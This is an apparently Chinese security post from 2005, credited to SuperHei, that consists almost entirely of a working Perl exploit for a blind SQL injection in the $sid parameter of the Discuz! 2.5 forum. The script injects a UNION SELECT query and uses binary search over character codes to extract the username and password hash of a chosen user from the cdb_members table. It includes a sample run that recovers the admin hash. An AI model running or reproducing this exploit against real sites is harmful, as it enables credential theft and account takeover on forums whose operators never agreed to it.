Discuz! 2.5 $sid SQL injection exploit

猪猪

本文作者：SuperHei 文章性质：原创 发布日期：2005-10-18

#!/usr/bin/perl #Discuz! 2.5 $sid SQL injection exploit #Need magic_quotes_gpc = Off #Bug Found By SuperHei_at_www.4ngel.net #The codz base on 1dt.w0lf(rst.void.ru) Thx! # #C:\Perl\bin>dz3.pl http://127.0.0.1/Discuz!_2.5F_gb/upload 1 #Please wait... #[||||||||||||||||||||||||||||||||||||||] # #------------------x REPORT x------------------- # Uid: 1 # Username: admin # Password Hash: 25f9e794323b453885f5181f1b624d0b #------------------x REPORT x------------------- #total requests: 326 use LWP::UserAgent; $path = $ARGV[0]; $uid = $ARGV[1]; $string = "to:"; $s_num = 1; $n=0; $|++; if (@ARGV < 2) { &usage; } print "Please wait...\r\n"; print "["; while(1) { 　　& found(0,122); 　　if ($char=="0") 　　{ 　　　　print "]\r\n\r\n"; 　　　　($res1,$res2)=split(":",$allchar); # 　　　　print "------------------x REPORT x-------------------\r\n"; 　　　　print " Uid: $uid\r\n"; 　　　　print " Username: $res1\r\n"; 　　　　print " Password Hash: $res2\r\n"; 　　　　print "------------------x REPORT x-------------------\r\n"; 　　　　print "total requests: $n\r\n"; 　　　　exit(); 　　} 　　else 　　{ 　　　　print "|"; 　　　　$allchar .= chr($char); 　　} 　　$s_num++; } sub found($$) { 　　my $fmin = $_[0]; 　　my $fmax = $_[1]; 　　if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char; } 　　$r = int($fmax - ($fmax-$fmin)/2); 　　$check = ">$r"; 　　if ( &check($check) ) { &found($r,$fmax); } 　　else { &found($fmin,$r+1); } } sub crack($$) { 　　my $cmin = $_[0]; 　　my $cmax = $_[1]; 　　$i = $cmin; 　　while ($i<$cmax) 　　{ 　　　　$crcheck = "=$i"; 　　　　if ( &check($crcheck) ) { return $i; } 　　　　$i++; 　　} 　　return; } sub check($) { 　　$n++; 　　$ccheck = $_[0]; 　　$http_query = $path."/index.php?sid=' union select null,null,null,null,null from cdb_members where uid=".$uid." AND ascii(substring(CONCAT(username,CHAR(58),Password),".$s_num.",1))".$ccheck." /*"; 　　# print "\r\n $http_query \r\n"; 　　$mcb_reguest = LWP::UserAgent->new() or die; 　　$res = $mcb_reguest->post($http_query); 　　@results = $res->content; 　　@num=grep /$string/, @results; 　　$size=@num; 　　if ($size > 0) { return 1; } 　　return 0; } sub usage { 　　print "=========================================================\r\n"; 　　print " Discuz! 2.5 \$sid SQL injection exploit\r\n"; 　　print " Need magic_quotes_gpc = Off \r\n"; 　　print "=========================================================\r\n"; 　　print " Usage: $0 [bbspath/] [uid]\r\n"; 　　print " e.g. : $0 http://127.0.0.1/bbs 1\r\n"; 　　print "=========================================================\r\n"; 　　exit(); }